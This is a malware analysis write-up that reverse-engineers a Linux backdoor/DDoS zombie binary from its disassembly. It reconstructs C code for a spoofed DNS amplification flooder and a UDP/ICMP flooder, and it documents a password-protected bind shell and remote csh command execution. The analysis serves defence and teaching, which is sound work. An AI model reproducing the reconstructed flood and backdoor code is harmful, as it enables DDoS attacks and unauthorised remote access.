file(1) reveals that the binary is statically linked x86-linux ELF. I will analyze this binary based on the output of $ objdump -drs the-binary > dump (The -r is superfluous in this case but my fingers are used to it) A hastily hacked together perl script (findsyscalls.pl) reveals the syscall wrapper routines in the binary: 80569fc: wait4(pid_t, int *, int, struct rusage *) 8056a2c: accept(int s, struct sockaddr *, socklen_t *) 8056a74: bind(int, struct sockaddr *, socklen_t) 8056abc: connect(int, struct sockaddr *, socklen_t) 8056b04: listen(int, int backlog) 8056b44: Syscall: 102 - 10 (RECV) 8056b90: Syscall: 102 - 12 (RECVFROM) 8056bf0: Syscall: 102 - 9 (SEND) 8056c3c: sendto(sock,msg,len,flags,sockaddr_in to,tolen) 8056c9c: Syscall: 102 - 14 (SETSOCKOPT) 8056cf4: socket(AF_INET,SOCK_RAW,IPPROTO_RAW) 8057134: chdir(const char*) 8057160: close(int) 805718c: dup2(int,int) 80571b8: Syscall: 11 (execve) 80571e8: fork() 805720c: geteuid() 8057230: getpid() 8057254: gettimeofday(struct timeval *, struct timezone *) 8057280: Syscall: 54 (ioctl) 80572b0: kill(pid_t,int) 80572dc: open(char*,int flags,int mode) 805730c: read(int,char*,size_t) 805733c: setsit() 8057360: sigprocmask(int how, const sigset_t *, sigset_t *) 8057390: uname(struct utsname *buf) 80573bc: unlink(const char*) 80573e8: write(int,const char*,size_t) 8057418: alarm(int) 8057444: time(time_t*) 8057470: Syscall: 146 (writev) 80574a0: Syscall: 82 (select) 80574c8: sigaction(int sig, const struct sigaction *, struct sigaction *) 805751c: sigsuspend(const sigset_t *mask) 8057554: exit(int) 8065cec: Syscall: 90 (mmap) 8065d50: Syscall: 106 (stat) 8065d8c: Syscall: 108 (fstat) 80660f4: Syscall: 55 (fcntl) 8066124: Syscall: 19 (lseek) 8066154: Syscall: 91 (munmap) 8066180: Syscall: 145 (readv) 80661b0: Syscall: 163 (mremap) 80661e8: Syscall: 45 (brk) 8066230: Syscall: 45 (brk) Without looking any closer, I'd guess one of the brk is brk and the other is sbrk. Let's see who calls execve (80571b8): 80555fc and 80557e8. 80555fc: execl() the routine starts by allocating a 32k buffer on the stack. the fingerprint matches execl.o from libc 5, glibc does it much more elaborately. So this binary is a statically linked libc 5 binary! 80557e8: system() this routine is so close that I guess it's also from libc. syscall annotation shows lots of signal stuff, the fingerprint matches system() from libc5. Obviously, this binary is a really quick hack. The syscalls shows a .fini and a .start section. libc5 always puts the same in those: 8048110: __do_global_dtors_aux 80675a8: __do_global_ctors_aux The obvious next step is to create a dump of libc5 for cross reference. First thing we do is solve the brk puzzle. 80661e8: __sbrk() 8066230: __brk() Now let's look for some central functions, like malloc and getenv. getenv is easy to spot, because it contains a characteristic "cmpb 0x3d,", and it is good to have identified because it also references environ and calls strncmp. 8055668: getenv() 806d228: __environ 8057b04: strncmp Now that we have a variable, it is time to extent annotate so it can also annotate constants. The easiest constant is errno, of course. 8078b14: errno Mhh. This libc was apparently compiled without thread support. That makes cross referencing a little more difficult (no __errno_location). Humm. casual browsing for variables finds this: 8048590: e8 53 ec 00 00 call 0x80571e8 /* Syscall: 2 (fork) */ 8048595: a3 70 e7 07 08 mov %eax,0x807e770 /* 0x807e770 == ??? */ So it's a good guess that 807e770: backdoor_child_pid Back to the central functions. strlen is pretty important and should be easy to recognize. Unfortunately, gcc -O won't produce calls to it, it will simply inline "repnz scas". Too bad. :-( 8057adc: strcmp moving to some more casual observations. The code calls unlink once, before exiting: 8048705: 68 e6 75 06 08 push $0x80675e6 /* 0x80675e6 == ??? */ 804870a: e8 ad ec 00 00 call 0x80573bc /* Syscall: 10 (unlink) */ so it's a safe bet that 0x80675e6 points to some buffer with a file name. 80675e6: file_name_to_unlink grepping for this offset shows that it is never written, just read. So this is probably something like const char* my_file_name="whatever"; But wait, objdump can also write a hex dump. The hex dump reveals the constant to be "/tmp/.hj237349". 80675e6: "/tmp/.hj237349" Directly before that string, right at the start of .rodata, is another interesting string: "[mingetty]". This looks like a sensible string to write over argv[0]. 80675d8: "[mingetty]" This offset is referenced exactly once, at 80481aa, right before calling fork. The code does not call strcpy, however, but it copies four 32-bit words manually. Anyway, let's extract some more constants for annotate.pl: 80675f5: "/bin/csh -f -c \"%s\" 1> %s 2>&1" 8067614: "rb" 8067617: "TfOjG" 806761d: "\xff\xfb\x01" 8067621: "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:." 8067651: "PATH" 8067656: "HISTFILE" 806765f: "linux" 8067665: "TERM" 806766a: "sh" 806766d: "/bin/sh" 8067675: "/bin/csh -f -c \"%s\" " 806768a: "%d.%d.%d.%d" 80678f3: "RESOLV_HOST_CONF" Oh, "rb". That reeks of fopen, freopen or fdopen. At 8048620 it's called with the magic /tmp file name, so it's fopen. 804f620: fopen() The next call there pushes a small number (count?) and a 1 as middle two arguments of four, so it's fread or fwrite. The result is used as index and \0 is written, so this looks like zero-terminating the result of fread. 804f6d4: fread() Just before unlink, the FILE* is once again used as single argument to a function, which is probably fclose then. 804f540: fclose() Now I want to identify malloc. fclose probably calls it. The libc5 sources show that fclose calls _IO_file_close_it and free and references stdin, stdout and stderr. 8060d44: _IO_file_close_it() 805c290: free() 80786fc: stdin 8078750: stdout 80787a4: stderr Now, free() and malloc() are probably linked in side by side. Let's look at the bowels of the libc5 malloc: 805bb34: __free_hook Not so easy. Let's go for the other constants. 80678c4: "gethostby*.getanswer: asked for..." The good thing about the DNS routines is that they reference stuff all over the place, and in a very deterministic order if one has access to the libc sources. 804b800: static struct hostent* getanswer() 804f7ec: printf() 804dfe0: res_query(qbuf,C_IN,T_PTR,buf,sizeof(buf)) 804e180: res_search(name,C_IN,T_A,buf,sizeof(buf)) 807e788: h_errno 804f808: sprintf() 804c234: gethostbyaddr() 804a9d8: init_services() [dns helper] 805e954: libc_nls_init() 8079dd4: service_order[] 8067b77: "%u.%u.%u.%u.in-addr.arpa" 807854c: _res.options 8078514: spoof [dns] 8056640: strcpy() 8078520: numtrimdomains [dns] 804bf80: gethostbyname() 8056450: bcmp() 8078518: spoofalert 80552b0: openlog() 805e584: catgets() 8054eb0: syslog() 804a580: trim_domains() 804f680: fprintf() 8067950: " ,;:" 8057b30: strpbrk() 8067913: "r" 8067904: "/etc/host.conf" 804f5c4: fgets() 8057be8: rindex() 8067915: "order" 8056570: memmove() 80568d0: strtok() 8056664: strdup(const char*) 8067b57: "hosts.byname" 804c6fc: _gethtbyname(const char*) 8056954: gethostname(char* name,sizeof name) 80565f8: strcasecmp(const char*,const char*) 8056480: bcopy(const void*,void*,size_t) 804cb94: _gethtbyaddr(const char *addr, int len, int type) 804c574: _endhtent() 804c538: _sethtent() 804c5a4: _gethtent() 8054db8: rewind() 804ce8c: inet_addr() 805d5f8: yp_get_default_domain(char* domain) 805d3a8: yp_match(domain, map, name, strlen(name), &result, &resultlen) 805d638: yp_first(domain, map, &keyname, &keylen, &result, &resultlen) 805d814: yp_next(domain, map, keyname, keylen, &keyname,&keylen, &result, &resultlen) 8057970: index/strchr(const char*, char) Gee, that wasn't bad for a bunch of DNS routines which were 100% identified by a few error message constants... Now that we have strdup, we also have malloc and memcpy: 805bd74: malloc(size_t) 805652c: memcpy(void*,const void*,size_t) Let's look inside fgets() to get the missing string functions. 804f734: _IO_getline() 8061a70: __underflow() 80575c0: memchr(const void *, int, size_t) We still need realloc(). 804d744: res_init() 80785a4: res_status 805680c: strncpy() That should be enough to understand what this program does. Unsurprisingly, .text begins with crt1.o from libc5. objdump -dr crt1.o gives us a few more symbols: 8078b18: __fpu_control 805756c: __setfpucw() 8056d44: __libc_init() 80675d0: _fini 8055f08: atexit() 8048080: _init() 8048134: main() 8055fbc: exit() 8048100: done [crt1] Looking at main, we see a function at 8057764 called, which we didn't identify yet. A quick look at the disassembly shows that it's memset. 8057764: memset(void*,int,size_t) main uses a lot of temporary variables. It is time to extend annotate.pl again. main/0x8: argc main/0xc: argv[0] main/0xfffff800: u.recvbuf[2048] main/0xfffff814: u.p.s main/0xfffff816: u.p.rest main/0xfffff000: unsigned char plaintext[2048] main/0xffffee48: struct in_addr IPs[10] main/0xffffbb44: char buf7[255]; main/0xffffbb40: int yes (1, for setsockopt); main/0xffffbb3c: socklen_t addrlen == sizeof(sockaddr_in); main/0xffffbb38: int sock main/0xffffbb30: ptr1 (init u.recvbuf) main/0xffffbb2c: ptr2 (init &u.p.s) main/0xffffbb28: ptr3 (init &u.p.rest) main/0xffffbb20: ptr4 (init plaintext) main/0xffffbb1c: ptr5 (init IPs) 80569bc: signal(int,sighandler_t); 0=DFL, 1=IGN 80559a0: srandom(int seed) 80675e3: "/" 807e774: child_pid (init 0) 807e778: activity_mode (init 0) activity_mode is written in several places, each time right in the beginning of a protocol handler, with the number of the handler as constant, i.e. "case 11: activity_mode=11;" That's why I guess it is meant to keep state on what mode the program currently is in. int unk1; pid_t backdoor_child_pid; unt unk2; main(int argc,char* argv[]) { union { char recvbuf[2048]; struct { struct iphdr h; short s; char rest[2026]; } p; } u; char plaintext[]; struct in_addr IPs[10]; char* ptr1=u.recvbuf; char* ptr2=&u.p.s; char* ptr3=&u.p.rest; socklen_t addrlen=sizeof(struct sockaddr_in); int sock; if (geteuid()) exit(-1); memset(argv[0],0,strlen(argv[0])); strcpy(argv[0],"[mingetty]"); /* 80481cc */ signal(SIGCHLD,SIG_IGN); if (fork()) exit(0); setsid(); signal(SIGCHLD,SIG_IGN); if (fork()) exit(0); /* 804820c */ chdir("/"); close(0); close(1); close(2); /* so far this looks like daemon() */ backdoor_child_pid=0; unk1=0; unk2=0; srandom(time(0)); /* this srandom is a guess. It looks a little like my libc5 srandom, but not completely. It shares the constant 0x3039 with it, and it is called several times with time(0) as argument, so guessing srandom is not completely arbitrary */ sock=socket(AF_INET,SOCK_RAW,0xb); /* 0xb is not a well-known protocol. */ /* now for the "cover my ass" area */ signal(SIGHUP,SIG_IGN); signal(SIGTERM,SIG_IGN); signal(SIGCHLD,SIG_IGN); signal(SIGCHLD,SIG_IGN); /* yes, twice, probably a cut and paste error */ /* 8048297 */ ptr4=plaintext; ptr5=IPs; int esi=recv(sock,u.recvbuf,0x800,0); /* I guess sizeof(recvbuf)==0x800 */ for (;;) { if (u.p.h.protocol==0xb && u.p.rest[0]==2 && esi>0xc8) { /* the trigger is to receive an IP packet with protocol 11, where the protocol header has a 2 byte at offset 2, and which is more than 200 bytes long */ /* 80482fa */ decrypt(esi-22,u.p.rest,plaintext); /* the esi-22 throws away the IP header (20 bytes) and the short. I guess the short is there for alignment reasons. */ switch (plaintext[1]) { /* switch table: 804835c (1) 80483f0 (2) 8040590 (3) 804871c (4) 80487c8 (5) 8048894 (6) 8048acc (7) 8048b58 (8) 8048b80 (9) 8048c34 (10) 804d808 (11) 8048de4 (12) 8048eb8 (default) */ } } /* 8048eb8 */ usleep(10000); /* 1/100 sec */ } } This code uses a raw socket to read IP packets with protocol 11 from the network, which are at least 200 bytes long. It then decrypts them with the moronic rot23 scheme and dispatches the command, which is specified by the second byte in the decrypted payload. 804a1e8: decrypt(int len,char* code,char* plaintext) 80678bf: "%c%s" 80675e5: (char)0 The decryption routine at 804a1e8 is very convoluted and obvuscated. It took me several iterations to understand it. This is a simple version: void decrypt(int len,const unsigned char* code,unsigned char* plaintext) { int i; for (i=0; i %s 2>&1",plaintext,"/tmp/.hj237349"); system(u.recvbuf); FILE* f=fopen("/tmp/.hj237349","rb"); if (f) { edi=0; ptr6=buf6; ecx=f; do { esi=fread(u.recvbuf,1,398,f); u.recvbuf[esi]=0; memcpy(plaintext+2,u.recvbuf,398); if (edi==0) { /* 8048689 */ plaintext[1]=3; edi=1; } else { /* 804869c */ plaintext[1]=4; } /* 80486a3 */ encrypt(398,ptr4,buf6); /* 80486bb */ SendNPackets(IPs,buf6,(rand()%201)+400); /* 80486e4 */ usleep(400000); } while(esi==0); /* 80486f9 */ fclose(f); unlink("/tmp/.hj237349"); } /* 0x8048712 */ exit(0); } It's pretty obvious what this code does. It dissociates itself from its father, then runs the decrypted payload as command through csh. The output of the command is saved to the magic temp file and sent back as encrypted spread spectrum answer through SendNPackets. Why the first child sleeps and then sends itself a kill -9 is not obvious to me. It may be some BSD legacy magic for process group dissociation or it may be that the author actually intended it the other way around, i.e. kill the grandchild after 10 seconds. main/0xffffbb24: FILE* f main/0xffffee70: buf6 main/0xffffbb18: ptr6 (init buf6) Let's continue with case 4. case 4 does nothing if child_pid is not 0. It is initialized to zero in main. It then records its number (4) in activity_mode, forks, and writes the pid of the child to child_pid. The child then does the following: /* 8048745 */ memcpy(buf7,plaintext,255); /* 804875c */ memmove(buf7,buf7+9,255); /* 8048777 */ func_8049174(plaintext[2],plaintext[3],plaintext[4],plaintext[5],0, plaintext[6],plaintext[7],plaintext[8],buf7); /* 80487c0 */ exit(0); Let's look at func_8049174. At first glance, it opens a raw socket, calls random() several times, contains a sleep for 5 minutes, and apparently does an infinite loop around sendto and usleep. It has all the hallmarks of a flooding routine, so let's call it do_flood. Since it has so many parameters, those probably determine the header. The memmove removes the bytes that were used as parameters, which probably leaves the intended payload behind. 8049174: do_flood(ip0,ip1,ip2,ip3,flag,arg1,arg2,arg3,hostname) I don't think it is necessary to find out what the function does exactly, but let's verify one thing: the first four arguments are type char. It may be an IP number. Let's look at the sendto arguments. the packet is in a local buffer at fffff9c8, the first four arguments are copied to fffff9d4, which is in that buffer at offset 12, which is the offset of the source IP in an IP header. Just to make sure, let's see if the first byte is set to 0x45 again: yep, at 80493f7. do_flood/0x8: ip0 do_flood/0xc: ip1 do_flood/0x10: ip2 do_flood/0x14: ip3 do_flood/0x18: flag do_flood/0x1c: arg1 do_flood/0x20: arg2 do_flood/0x24: arg3 do_flood/0x28: hostname 8049174: do_flood(srcip[0],srcip[1],srcip[2],srcip[3],flag,sport[0],sport[1],usehostname,hostname) int sendto(int s, const void *msg, size_t len, int flags, const struct sockaddr *to, socklen_t tolen); do_flood/0xfffff9a8: raw_sock (sendto argument) do_flood/0xfffff9c8: void* msg (sendto argument) do_flood/0xfffffdd8: struct sockaddr to (sendto argument) do_flood/0xfffff9d4: source ip in IP header in msg OK, so we now know the source address. But where does the code send the packet? At 80491ef, the code writes a 2 to the first word of struct sockaddr, which is AF_INET, so it's actually a sockaddr_in. do_flood/0xfffffdd8: struct sockaddr_in to (sendto argument) sin_port is set to 0 (80491f8), and the IP is set to the IP the pointer at 0xfffff994 points to. This pointer is incremented by 4 at 804951a, so it points to an array of IPs which the routine iterates through. The end of the array is marked by a 0.0.0.0 IP, which is tested in 8049521. do_flood/0xfffff994: pointer_to_destination_ip This pointer is initialized to 0x806d22c, which is the first preinitialized variable in the .data segment, right after __environ (which is referenced from the startup code and thus linked in before the variables in the main program). This list is zero terminated. Now this is interesting. The list is, as I said, zero terminated. The first zero IP is at 0x80784f0, which makes the list a whopping 45764 bytes or 11441 IPs big! Just to make sure, I did DNS lookups on the first and last IP in the list: 2.130.0.12.in-addr.arpa domain name pointer www.connell-lp.com 114.194.91.80.in-addr.arpa domain name pointer portal.pelitec.net.ru Oi! Now either that man has made himself a _long_ list of enemies, or this is not supposed to be a flood routine but rather a beacon routine where the trojan announces its presence. I am just running a reverse DNS lookup filter over the IP list, and it contains a ton of big and important DNS servers. On of our local DNS servers is also part of the list. I sent a mail to the admin asking whether they had noticed any unusual traffic, I'm curious what he'll have to say. I poked around a little with the IPs and I found out that those are not just DNS servers, those are open DNS relays, i.e. they will happily answer queries for anyone. That gives more weight to the beacon theory, because with open DNS relays, you can alert yourself about installed zombies without a direct contact. All you have to do is own an authoritative DNS server, say "compromised.net", and then tell your zombie using a control packet with a spoofed source IP to ask his public DNS servers for [base64(hisip)].compromised.net. This way, a traffic analysis on the compromised host will not reveal the IP of the controller unless the zombie is still running and the traffic analysis looks into the DNS packets. Back to do_flood. do_flood/0xfffff9bc: copy of srcip[0] do_flood/0xfffff9b8: copy of srcip[1] do_flood/0xfffff9b4: copy of srcip[2] do_flood/0xfffff9b0: copy of srcip[3] do_flood/0xfffff9a4: pointer to UDP header Well, it makes sense to send DNS packets to DNS servers. So let's have a look at those constants in .rodata which this routine happens to touch. It copies 9 words from 8067698. Those look like a bunch of small numbers. After it is stuff that looks like garbage but upon closer inspection is half assembled DNS packets! DNS queries start with a 16-bit sequence number (476e or "Gn" here), then \001\000 to mark it a query and say you want the resolver to do recursion for you, then a \000\001 as 16-bit query record count (you normally ask for one record) and three 16-bit counters that are all zero. Then comes the real query in DNS encoding (i.e. [length byte][query string], i.e. "usc.edu" becomes \003usc\003edu\000. After that come the record type and class as big endian 16-bit value (in this case SOA and IN (6 and 1)). And upon closer inspection the small numbers suddenly make sense: they are the lengths of the individual packets! Now, how does this make sense. The code uses raw sockets to be able to spoof the source IP of the DNS queries. It appears to make sure it sends correct DNS queries, so the servers will answer. And it has a list of 11000 DNS servers. This only makes sense if it is a double-indirect flood! The attacker tells his zombie to send out DNS requests to public DNS servers with the spoofed source IP of the victim host to be flooded, and the packets that kill the poor victim do not come from the zombie itself but from the public DNS servers! In effect, this is a DDoS tools that is practically impossible to defend against, because you can't cut the traffic to all the public DNS servers, most of them are vital to the infrastructure. I.e. if you cut the traffic from the wired.com DNS servers, your clients cannot read Wired's internet publication or send email to them! Plus, you can't see who is causing it, because each DNS server will probably only see a sevearl spoofed queries per minute from each zombie, so the signal will drown in the noise. The only defense currentyl is to configure your DNS servers not to relay answers or at least block queries for IN SOA .com IN SOA .net IN SOA .de IN SOA .edu IN SOA .org IN SOA .usc.edu IN SOA .es IN SOA .gr IN SOA .ie This list looks quite strange to me. Greek, Spain and Ireland are not traditionally known for their big bandwidth. Also, why aren't there any asian TLDs in here? Is the author an American? ;) The DNS sequence number is randomized. This is funny because the DNS sequence number is initialized as "Gn" in the static DNS queries, so either the author just put a captured DNS packet there or he put his initials there? 806d22c: uint32_t public_dns_servers[] 8067698: attack dns packet length table 80676bc: attack dns packet table do_flood/0xffffffdc: local copy of attack dns packet length table do_flood/0xfffff9ac: some_flag (init 1) do_flood/0xfffffde8: local copy of attack dns table do_flood/0xfffff9dc: first byte after IP header (udp source port?) do_flood/0x1c: sport[0] do_flood/0x20: sport[1] do_flood/0x24: bool usehostname do_flood(srcip[0],srcip[1],srcip[2],srcip[3],flag,sport[0],sport[1],usehostname,hostname) { char lc_dnslen[9*4]; /* local copy of dns length table */ char lc_dnstab[500]; /* local copy of dns table */ char msg[1024]; /* message to be sent out with sendto */ short* udp_header; char* udp_payload; struct sockaddr_in si; int raw_sock; local_intptr1, iterations_to_dns_lookup; uint32_t local_ipofhostname; int some_flag; uint32_t* pointer_to_destination_ip; /* 80491a4 */ memcpy(lc_dnslen,dnstab,9*4); some_flag=1; memcpy(lc_dnstab,dnstab,500); /* 80491d1 */ esi=msg; udp_header=&msg[20]; /* udp source port? */ udp_payload=&msg[28]; /* udp payload, i.e. start of DNS data */ /* 80491ef */ si.sin_family=AF_INET; si.sin_port=0; if (flag) --flag; /* 0x804920a */ raw_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW); if (raw_sock>0) { local_intptr1=iterations_to_dns_lookup=0; memset(msg,0,1024); /* 804924d */ for (;;) { do { /* call gethostbyname until it resolves!1!! */ edi=0; if (usehostname && iterations_to_dns_lookup<1) { struct hostent* edx=getbyhostname(hostname); /* 804926f */ if (edx==0) { sleep(600); edi=1; } else { /* 0x8049288 */ bcopy(edx->h_addr_list[0],&local_ipofhostname,4); msg[12]=local_ipofhostname; /* duh */ iterations_to_dns_lookup=40000; /* counter? */ } /* 0x80492b2 */ } } while (edi); /* 80492b6 */ long ofs=0; for (edi=0; edi<9; ++edi) { /* 80492c4 */ if (some_flag==1) { some_flag=0; edx=random()%8000; } else { /* 0x80492e8 */ edx=0; } /* 0x80492ea */ if (public_dns_servers[edx]) { pointer_to_destination_ip=&public_dns_servers[edx]; { /* 8049308 */ sin.sin_addr.s_addr=*pointer_to_destination_ip; /* 8049316 */ memcpy(udp_payload,&lc_dnstab[ofs],lc_dnslen[edi]); /* 8049338 */ udp_payload[0]=random()%255; udp_payload[1]=random()%255; /* 8049363 */ if (arg1==0 && arg2==0) { /* 804936f */ eax=random()%30000; } else { /* 0x8049380 */ eax=(arg1<<8)+arg2; } /* 0x804938a */ eax=ntohs(eax) udp_header[0]=eax; /* short[]! */ udp_header[1]=0x3500; /* udp destination port: ntohs(53) */ /* 80493a1 */ udp_header[2]=ntohs(lc_dnslen[edi]+8); /* udp payload length plus header size */ udp_header[3]=0; /* 80493b6 */ if (usehostname==0) { msg[12]=srcip[0]; msg[13]=srcip[1]; msg[14]=srcip[2]; msg[15]=srcip[3]; /* copy copy of src ip to IP header */ } /* 0x80493ec */ *(uint32_t)&msg[16] = *pointer_to_destination_ip; msg[0]=0x45; /* ip version 4, header len 5 words */ /* 80493fa */ mesg[8]=(random()%130)+120; /* semi-random IP TTL */ *(uint16_t)&msg[4] = random()%255; /* IP ID 0-254 */ msg[9]=17; /* IP protocol = IPPROTO_UDP */ *(uint16_t)&msg[6]=0; /* frag_off zero */ *(uint16_t)&msg[2]=ntohs(lc_dnslen[edi]+0x1c); /* IP tot_len = length of payload + udp header + ip header */ *(uint16_t)&msg[10]=0; /* checksum zero */ /* 804943d */ /* I skip the checksum code here, as it is a verbatim copy of several other locations in this code and quite standard */ /* 80494ad */ sendto(raw_sock,msg,lc_dnslen[edi]+0x1c,0,&sin,sizeof(sin)); /* 80494d6 */ if (flag==0) { usleep(300); } else { /* 0x80494e8 */ if (local_intptr1!=flag) goto huh; usleep(300); local_intptr1=0; } /* 0x8049507 */ --iterations_to_dns_lookup; goto huh2; huh: /* 0x8049514 */ ++local_intptr1; /* yuck! How did the guy get gcc to generate this code! */ huh2: /* 0x804951a */ } while (*pointer_to_destination_ip++); } /* 0x8049530 */ ofs+=32; } /* 8049541 */ } } /* 0x8049548 */ child_pid=0; /* this is the error handling if socket failed */ return 0; } I find this code surprisingly bad. The author does lots of unnecessary stuff like copying the read-only DNS tables to local variables... and then still not writing to them! There is absolutely no gain here. Or the way he passes the IP number as four promoted integers, copying them to local variables (I already optimized this step away in the above code), and later copying those local variables into the IP header. The whole protocol looks pretty strange. All the arguments save flag come verbatim from the decrypted command packet. If usehostname is set, gethostbyname is called on hostname. The idea is that this code will resolve the name anew every 40000 iterations. This is probably meant to thwart defenses like whitehouse.gov did (change IP, blackhole old IP on router, announce new IP in DNS). So the idea is pretty good, but the code looks like the guy does not have much C experience and just copied some code from other places together. Just look at the gethostbyname code! It uses bcopy to copy 4 bytes into a local variable which it then copies into the header. Why not copy directly into the header? He probably didn't get the cast right. What does this function do? You pass it an IP (4 args) and a port (2 args), a flag (0) of which I don't understand the meaning yet, usehostname and hostname. The routine will then create a raw socket and send spoofed packets claiming to come from the victim. The passed IP is used unless usehostname is nonzero. Then hostname is resolved and the first IP from the response is used. After that, the code puts together an IP header, a UDP header and a UDP payload, which he takes from a static list of 9 requests asking for the IN SOA of .com, .net, .de, .edu, .org, .usc.edu, .es, .gr and .ie. If the specified UDP source port is zero, a random port below 30000 is used. The code starts at a random server below index 8000 for .com, at index 0 for the other records. Then it sends the same query to each of the remaining servers in the list, pausing for 300 usec between queries. This makes sure the process does not eat enough CPU time to appear prominently in top, and it avoids clogging the LAN with billions of collisions. This sending is done in an endless loop. The idea here is that this function is called in the child process forked off the main zombie process which notes the PID in child_process so it can kill it later on demand. This type of flood looks very dangerous. In effect you can't defend against it. The traffic is not coming from the dial-up networks of the infected Mom and Pop machines, it is coming from public DNS servers with big bandwidth. You can't blackhole them or you would kill your own DNS. And, on each of the abused servers, the traffic pattern is only roughly one query every 3.5 seconds, so it does not stick out on a very busy big DNS server. The only way to defend against this is to install egress filters at all major ISPs. do_flood/0xfffff9a4: pointer to udp header do_flood/0xfffff9e4: udp payload area do_flood/0xfffff9c4: result IP of gethostbyname is bcopy'd here do_flood/0xfffff9a0: pointer to udp payload area do_flood/0xfffff99c: local_intptr1 do_flood/0xfffff998: iterations_to_dns_lookup do_flood/0xfffff990: ofs do_flood/0xfffff98c: tmp_ptr (checksum) do_flood/0xfffff9c2: tmp_int (checksum) Case 5: [being worked on by Olaf] appears to be a hybrid icmp/udp flooder. The udp packets have an invalid checksum and the icmp packets are ECHO request (i.e. ping). The source and destination IPs are set from the command packet. A flag says whether it sends icmp or udp. Here is Olaf's rendition of the case handler itself: if (child_pid) break; activity_mode=5; if (child_pid=fork()) break; memcpy(buf7,plaintext,255); memcpy(buf7,buf7+13,254); do_udp_icmp_flood( plaintext[2], plaintext[3], plaintext[4], plaintext[5], plaintext[6], plaintext[7], plaintext[8], plaintext[9], plaintext[10], plaintext[11], plaintext[13], buf7 ); exit(0); And this is Olaf's reverse engineering of the function itself: 80499f4: do_udp_icmp_flood(??) do_udp_icmp_flood/0xffffffd0: iphdr.c_ihl do_udp_icmp_flood/0xffffffd2: iphdr.tot_len do_udp_icmp_flood/0xffffffd4: iphdr.id do_udp_icmp_flood/0xffffff60: ptr -> sin do_udp_icmp_flood/0xffffff64: var (const 0x1d 29) do_udp_icmp_flood/0xffffff68: sock 8049b6c: ipv4checksum udp len=9 8049b9d: ipv4checksum end 8049bd2: ipv4checksum icmp len=9 8049c05: ipv4checksum end 8049c2c: ipv4checksum hdr len=20 8049c5d: ipv4checksum end do_udp_icmp_flood/0x8: use_udp do_udp_icmp_flood/0xc: destination_port_udp do_udp_icmp_flood/0x10: ip_addr0_0 do_udp_icmp_flood/0x14: ip_addr0_1 do_udp_icmp_flood/0x18: ip_addr0_2 do_udp_icmp_flood/0x1c: ip_addr0_3 do_udp_icmp_flood/0x20: ip_addr1_0 do_udp_icmp_flood/0x24: ip_addr1_1 do_udp_icmp_flood/0x28: ip_addr1_2 do_udp_icmp_flood/0x2c: ip_addr1_3 do_udp_icmp_flood/0x30: flag_have_host_name do_udp_icmp_flood/0x34: host_name void do_udp_icmp_flood( unsigned char use_udp, unsigned char udp_dport, unsigned char ip_addr0_0, unsigned char ip_addr0_1, unsigned char ip_addr0_2, unsigned char ip_addr0_3, unsigned char ip_addr1_0, unsigned char ip_addr1_1, unsigned char ip_addr1_2, unsigned char ip_addr1_3, unsigned char flag_host_name, char*host_name) { struct { iphdr hdr; /* 0xffffffd0(%ebp) 20 */ union { /* 0xffffffe4(%ebp) */ udphdr udp; icmphdr icmp; } p; unsigned char d[4]; /* 0xffffffec(%ebp) */ } s; struct sockaddr_in sin; /* 0xfffffff0(%ebp) */ unsigned char buf2[32]; /* 0xffffffb0(%ebp) */ unsigned char buf1[32]; /* 0xffffff90(%ebp) */ sin.sin_family=AF_INET; sin.sin_port=htons(random()%255); sprintf(buf1,"%d.%d.%d.%d",b1,b2,b3,b4); if (flag_host_name==0) { sprintf(buf2,"%d.%d.%d.%d",a1,a2,a3,a4); sin.sin_addr.s_addr = inet_addr(buf3); } if ((sock = socket(2,3,255))>-1) { s.hdr.c_ihl = 0x45; s.hdr.tot_len = 0x1c28; s.hdr.id = 0x5504; s.hdr.frag_off= 0xfe1f; s.hdr.ttl = 120 + (random()%130); s.hdr.saddr = inet_addr(buf1); s.hdr.daddr = inet_addr(buf2); s.hdr.check = 0; if (use_udp) { s.hdr.protocol = 17; /* UDP */ s.p.udp.sport = htons(random()%255) s.p.udp.dport = htons(udp_dport); s.p.udp.len = 0x0900; /* len=9 */ s.hdr.check = s.p.udp.check = ipv4_checksum(&s.p,9); s.d[0] = 'a'; } else { s.hdr.protocol = 1; /* icmp */ s.icmp.type = 8; /* Echo Request */ s.icmp.code = 0; s.hdr.check = s.p.icmp.check = ipv4_checksum(&s.p,9); } s.hdr.check = 0; s.hdr.check = ipv4_checksum(&s.hdr,20); while(1) { int bla=0; counter=0; if (flag_host_name) { if (counter>0) { struct hostent*hent; if (hent=gethostbyname(host_name)) { unsigned int tmp; bcopy(hent->h_addr,&tmp,4); s.hdr.daddr=tmp; sin.sin_addr.s_addr=tmp; counter=40000; } else { sleep(600); bla=1; } } } if (!bla) { sendto(sock,&s,29,0,&sin,sizeof(struct sockaddr_in)); sendto(sock,&s,29,0,&sin,sizeof(struct sockaddr_in)); } --counter; } } else { child_pid=0; return 0; } } unsigned short ipv4_checksum(void*addr,unsigned int count) { register long sum = 0; while (count>1) { /* This is the inner loop */ sum+= *(unsigned short*)addr++; count-= 2; } /* Add left-over byte, if any */ if (count>0) sum+= *(unsigned char*)addr; /* Fold 32-bit sum to 16 bits */ while (sum>>16) sum = (sum&0xffff) + (sum>>16); return ~sum; } Case 6: This code has the same basic fork-setsid-child_pid sequence as 4 and 5, but then it does not call a function but does everything inline. It sets several signals to SIG_IGN: CHLD (thrice!), HUP, TERM, INT. A SO_REUSEADDR TCP socket is bound to port 23281 and listen(3) is called. Finally, accept() is called in a loop and for each connected client a new child is forked. The child then calls recv to read 19 bytes, scans the input for a \n or \r and overwrites them with 0. The bytes before the first \r or \n are incremented. The result is then compared with "TfOjG" (including trailing 0!). So, to match this, one has to send "SeNiF" ("FiNeS" backwards?). If the input did not match, "\xff\xfb\x01\x00" is written, the connection is closed and the child exits. This rings a bell but I don't know which one. Is this a TELNET sequence to confuse banner scanners? Don't know. Anyway, if the password matched, it gets more interesting: the descriptor is copied over stdin, stdout and stderr, setenv is used to put "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:." and "TERM=linux" in the environment and make sure HISTFILE is not in it (ROTFL), and then calls execl("sh","/bin/sh",0). Mhh, so it's the multi-tool in the backdoor market! _Two_ industry strength back doors for the price of one! ;) 804a2a8: setenv(const char *, const char *, int overwrite) Case 7: This code looks almost exactly like case 3, except that the output of the shell is thrown away and not sent back. Case 8: This is the clean-up command. It just sends SIGKILL to child_pid, i.e. it can be used to deactivate the currently running DDoS subprocess. Case 9: This is exactly like case 4, except that you can specify "flag". Case 4 always called do_flood() with flag==0. 